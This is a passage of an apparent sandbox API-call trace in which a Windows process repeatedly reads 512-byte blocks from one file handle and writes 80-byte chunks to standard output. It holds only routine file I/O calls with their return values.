lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.948] GetFileType (hFile=0x50) returned 0x1 [0128.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.948] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.948] GetFileType (hFile=0x50) returned 0x1 [0128.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.948] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.948] GetFileType (hFile=0x50) returned 0x1 [0128.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.948] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.948] GetFileType (hFile=0x50) returned 0x1 [0128.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.948] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.948] GetFileType (hFile=0x50) returned 0x1 [0128.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.948] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.948] GetFileType (hFile=0x50) returned 0x1 [0128.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.948] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.948] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.948] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.949] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.949] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.949] GetFileType (hFile=0x50) returned 0x1 [0128.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.949] GetFileType (hFile=0x50) returned 0x1 [0128.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.949] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.949] GetFileType (hFile=0x50) returned 0x1 [0128.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.949] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.949] GetFileType (hFile=0x50) returned 0x1 [0128.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.949] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.949] GetFileType (hFile=0x50) returned 0x1 [0128.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.949] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.949] GetFileType (hFile=0x50) returned 0x1 [0128.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.949] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.949] GetFileType (hFile=0x50) returned 0x1 [0128.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.950] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.950] GetFileType (hFile=0x50) returned 0x1 [0128.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.950] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.950] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.950] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.950] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.950] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.950] GetFileType (hFile=0x50) returned 0x1 [0128.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.950] GetFileType (hFile=0x50) returned 0x1 [0128.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.950] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.950] GetFileType (hFile=0x50) returned 0x1 [0128.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.950] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.950] GetFileType (hFile=0x50) returned 0x1 [0128.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.950] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.950] GetFileType (hFile=0x50) returned 0x1 [0128.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.951] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.951] GetFileType (hFile=0x50) returned 0x1 [0128.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.951] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.951] GetFileType (hFile=0x50) returned 0x1 [0128.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.951] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.951] GetFileType (hFile=0x50) returned 0x1 [0128.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.951] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.951] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.951] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.951] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.951] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.951] GetFileType (hFile=0x50) returned 0x1 [0128.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.951] GetFileType (hFile=0x50) returned 0x1 [0128.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.951] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.951] GetFileType (hFile=0x50) returned 0x1 [0128.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.952] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.952] GetFileType (hFile=0x50) returned 0x1 [0128.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.952] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.952] GetFileType (hFile=0x50) returned 0x1 [0128.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.952] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.952] GetFileType (hFile=0x50) returned 0x1 [0128.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.952] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.952] GetFileType (hFile=0x50) returned 0x1 [0128.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.952] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.952] GetFileType (hFile=0x50) returned 0x1 [0128.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.952] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.952] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.952] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.952] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.952] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.952] GetFileType (hFile=0x50) returned 0x1 [0128.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.952] GetFileType (hFile=0x50) returned 0x1 [0128.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.952] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.953] GetFileType (hFile=0x50) returned 0x1 [0128.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.953] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.953] GetFileType (hFile=0x50) returned 0x1 [0128.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.953] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.953] GetFileType (hFile=0x50) returned 0x1 [0128.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.953] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.953] GetFileType (hFile=0x50) returned 0x1 [0128.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.953] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.953] GetFileType (hFile=0x50) returned 0x1 [0128.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.953] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.953] GetFileType (hFile=0x50) returned 0x1 [0128.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.953] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.953] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.953] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.953] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.953] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.953] GetFileType (hFile=0x50) returned 0x1 [0128.954] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.954] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.954] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.954] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.954] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.954] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.954] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.954] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.954] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.954] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.954] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.954] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.955] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.955] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.955] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.955] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.955] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.955] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.955] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.955] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.955] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.955] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.955] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.955] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.955] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.956] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.956] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.956] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.956] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.956] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.956] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.956] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.956] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.956] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | 